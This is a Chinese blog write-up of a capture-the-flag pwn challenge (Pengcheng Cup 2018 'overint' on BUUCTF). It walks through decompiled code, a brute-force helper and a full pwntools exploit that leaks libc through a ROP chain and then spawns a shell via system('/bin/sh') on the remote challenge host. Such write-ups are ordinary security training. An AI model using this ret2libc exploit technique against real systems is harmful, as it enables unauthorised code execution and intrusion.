[BUUCTF-pwn] 鹏城杯_2018_overint

最新推荐文章于 2022-09-18 23:58:07 发布
最新推荐文章于 2022-09-18 23:58:07 发布
阅读量883 收藏 1
点赞数 1
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122812611
版权
该博客介绍了如何通过编程解决一道涉及缓冲区溢出和数学运算的解密问题。首先,使用循环和位运算找出一组数字,使它们经过特定运算后得到目标值35。然后,通过读取用户输入并进行累加,得到第二个目标值。最后,利用这些值修改内存中的数据,实现代码执行的控制流转移。整个过程展示了安全漏洞利用和逆向工程的基本思路。
摘要由CSDN通过智能技术生成

老大的帽儿。题目分3部分,第1部分要求输入4个字节这4个字节经过运算得35

__int64 __fastcall sub_4007D1(__int64 a1, int a2)
{
  int v3; // [rsp+18h] [rbp-8h]
  int i; // [rsp+1Ch] [rbp-4h]

  v3 = 0;
  for ( i = 1; i < a2; ++i )
  {
    printf("v[i] is %d\n", (unsigned int)*(char *)(i + a1));
    v3 = ((*(char *)(i + a1) >> 4) + 4 * v3) ^ (*(char *)(i + a1) << 10);
  }
  return v3 % 47 + (v3 % 47 < 0 ? 0x2F : 0);    // =35
}

第2部分要求至少5字节,这些和得 543372146

__int64 __fastcall sub_4006C6(int a1)
{
  __int64 result; // rax
  unsigned int buf; // [rsp+10h] [rbp-20h] BYREF
  char v3; // [rsp+14h] [rbp-1Ch]
  unsigned int v4; // [rsp+1Ch] [rbp-14h]
  int v5; // [rsp+20h] [rbp-10h]
  int v6; // [rsp+24h] [rbp-Ch]
  unsigned int v7; // [rsp+28h] [rbp-8h]
  unsigned int i; // [rsp+2Ch] [rbp-4h]

  v7 = 0;
  buf = 0;
  v3 = 0;
  v6 = 0;
  v5 = 0;
  puts("How many numbers do you have?");
  v6 = read(0, &buf, a1);
  if ( v6 == a1 )
  {
    v5 = buf;
    printf("m_num is %d\n", buf);
    if ( v5 > 4 )
    {
      for ( i = 0; (int)i < v5; ++i )
      {
        printf("the number %d is: \n", i);
        v4 = 0;
        v6 = read(0, &buf, a1);
        if ( v6 == a1 )
        {
          v4 = buf;
          printf("temp_num %d is %d\n", i, buf);
          v7 += v4;
        }
      }
    }
    result = v7;
  }
  else
  {
    puts("the length should be 4 bytes");
    result = 0LL;
  }
  return result;
}

然后两个数相加为负数(但第1次输入不能是负数),验证通过不可以输入不限量偏移和字节,也就是覆盖ret那块地。

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char v4; // [rsp+7h] [rbp-39h] BYREF
  int v5; // [rsp+8h] [rbp-38h] BYREF
  int v6; // [rsp+Ch] [rbp-34h] BYREF
  char v7[8]; // [rsp+10h] [rbp-30h] BYREF
  int v8; // [rsp+18h] [rbp-28h]
  int v9; // [rsp+1Ch] [rbp-24h]
  void *buf; // [rsp+20h] [rbp-20h]
  int v11; // [rsp+28h] [rbp-18h]
  int v12; // [rsp+2Ch] [rbp-14h]
  int v13; // [rsp+30h] [rbp-10h]
  unsigned int v14; // [rsp+34h] [rbp-Ch]
  unsigned int v15; // [rsp+38h] [rbp-8h]
  int i; // [rsp+3Ch] [rbp-4h]

  v15 = 4;
  v14 = 0;
  v13 = 0;
  v11 = 543372146;                              // "r3c "
  qmemcpy(v7, "abcde", 5);
  buf = &v7[1];
  v12 = *(_DWORD *)&v7[1];
  alarm(0x78u);
  setbuf(stdout, 0LL);
  puts("Please set arrary number: ");
  v14 = read(0, buf, (int)v15);
  printf("len is %d\n", v14);
  if ( v14 != v15 )
  {
    puts("the x length should be 4 Bytes!");
    exit(0);
  }
  v12 = *(_DWORD *)buf;
  v13 = sub_4007D1((__int64)v7, 5);             // 6,1,123,124
  if ( v13 != 35 )
  {
    puts("You get the wrong key!");
    exit(0);
  }
  if ( (unsigned int)sub_4006C6(v15) == v11 )   // 5:543372146,0,0,0,0
  {
    v12 += v11;
    if ( v12 > 4 )
    {
      printf("no!");
    }
    else
    {
      v6 = 0;
      puts("How many positions you want to modify?");
      v14 = read(0, &v6, (int)v15);
      if ( v14 == v15 )
      {
        for ( i = 0; i < v6; ++i )
        {
          v9 = 0;
          v8 = 0;
          v5 = 0;
          v4 = 0;
          puts("Which position you want to modify?");
          v9 = read(0, &v5, (int)v15);
          puts("What content you want to write in?");
          v8 = read(0, &v4, 1uLL);
          if ( v9 == v15 && v8 == 1 )
          {
            v7[v5] = v4;
            printf("str_pos is %c\n", (unsigned int)v4);
          }
        }
      }
      printf("hello!");
    }
  }
  return 0LL;
}

第1块数用程序爆一下,找最后一个是接近负数127的:6,1,123,124

#include <stdio.h>
#include <stdlib.h>

int main()
{
   int v3;
   v3=0;
   
   for(int i=0;i<256;i++)for(int j=0;j<256;j++)for(int k=0;k<256;k++)for(int l=0;l<256;l++){
       v3 = 0;
       v3 = ((i >> 4) + 4 * v3) ^ (i << 10);
       v3 = ((j >> 4) + 4 * v3) ^ (j << 10);
       v3 = ((k >> 4) + 4 * v3) ^ (k << 10);
       v3 = ((l >> 4) + 4 * v3) ^ (l << 10);   
       if(v3 == 35)printf("%d,%d,%d,%d\n", i, j, k, l);
   }
}

第2块就不用说了,随意,我这里用:543372146,0,0,0,0

后边就是puts(got.puts),start得到libc后再重来一遍再到这输入system(bin/sh)

完整exp:

from pwn import *

elf = ELF('./pwn')
libc_elf = ELF('../buuoj_2.27_amd64/libc-2.27.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
libc_start_main_ret = 0x21b97

def connect(local=1):
    global p
    
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 25269) 


pop_rdi = 0x0000000000400b13 # pop rdi ; ret
offset  = 0x38
start_addr = 0x4005d0

context(arch='amd64', log_level='debug')

def pwn():
    p.sendafter(b"Please set arrary number: \n", bytes([6,1,123,124]))
    p.sendafter(b'How many numbers do you have?\n', p32(5))
    for i in [543372146,0,0,0,0]:
        p.sendafter(b' is: \n', p32(i))
    
    payload = flat(pop_rdi, elf.got['puts'], elf.plt['puts'], start_addr)
    p.sendafter(b"How many positions you want to modify?\n", p32(len(payload)))
    for i,v in enumerate(payload):
        p.sendafter(b"Which position you want to modify?\n", p32(offset+i))
        p.sendafter(b"What content you want to write in?\n", p8(v))
    
    libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['puts']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[0] 
    print('libc:', hex(libc_base))
    
    #copy
    p.sendafter(b"Please set arrary number: \n", bytes([6,1,123,124]))
    p.sendafter(b'How many numbers do you have?\n', p32(5))
    for i in [543372146,0,0,0,0]:
        p.sendafter(b' is: \n', p32(i))
    
    payload = flat(pop_rdi+1, pop_rdi, next(libc_elf.search(b'/bin/sh')), libc_elf.sym['system'])
    p.sendafter(b"How many positions you want to modify?\n", p32(len(payload)))
    for i,v in enumerate(payload):
        p.sendafter(b"Which position you want to modify?\n", p32(offset+i))
        p.sendafter(b"What content you want to write in?\n", p8(v))
    
    p.sendline(b'cat /flag')
    p.interactive()

connect(0)
pwn()

石氏是时试
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 930
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 439
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
[BUUCTF-pwn] 鹏城_2018_easycalc
weixin_52640415的博客
02-09 321
保护基本全开,在add时有个off_by_null漏洞。fd位置只能修改。 unsigned __int64 m1add() { unsigned int v0; // ebx unsigned int v2; // [rsp+4h] [rbp-2Ch] BYREF size_t size; // [rsp+8h] [rbp-28h] BYREF __int64 v4; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp
鹏程2018 Pwn Writeup
Kaller的博客
12-05 1477
PWN  code   hash爆破(By:Apeng师傅): 得到wyBTs。 这里栈溢出,控制 ret后,“pop rdi ret”用来调用call。 1.leak_libc 把puts的got.plt表用puts函数输出 2.计算偏移,得到system和字符串/bin/sh 3.调用system。 from pwn import * context.log...
2022鹏城CTF---Crypto wp
3tefanie丶zhou的博客
07-07 2277
【我们对别人,对这个世界,所有的误会,可能都来自三个字,”我觉得“。】
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 434
buuctf-pwn 001-016题wp
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 986
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4080
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 285
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3227
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 278
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 245
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1152
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 242
buuctf-pwn 067~072题题解
2022鹏城CTF---Crypto
Luiino的博客
09-18 2362
第一部分,e与phi_n不互素,gcd(e,phi_n) == 4,此时e对phi_n没有逆元,但gcd(e//t,phi_n) == 1。mod n,由上面的for循环可以知道M与初始m的关系:M = m * (p-q-1)!对n进行分解,得到p、q,小的是q。记print(pow(m,e,n))里的m为M,故有c2 =第三部分, 看到M = 2022 * m * 1011 * p,又n = p*q,且c =记两输出结果分别为c1、c2,由print(pow(2,e,n))可以得到:c1 =
2021年“绿城”网络安全大赛-PWN-ezuaf
qq_43264813的博客
09-30 316
2021年“绿城”网络安全大赛-PWN-ezuaf 题目名称:ezuaf 题目内容:简单的uaf 题目分值:100.0 题目难度:容易 相关附件:ezuaf的附件24.txt 解题思路: 1.检查保护 2.函数分析 发现Delete中有uaf 3.思路 打malloc_hook exp from pwn import * #io = process('./uaf_pwn') io = remote('82.157.5.28',52402) elf = ELF('./uaf_pwn') libc
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值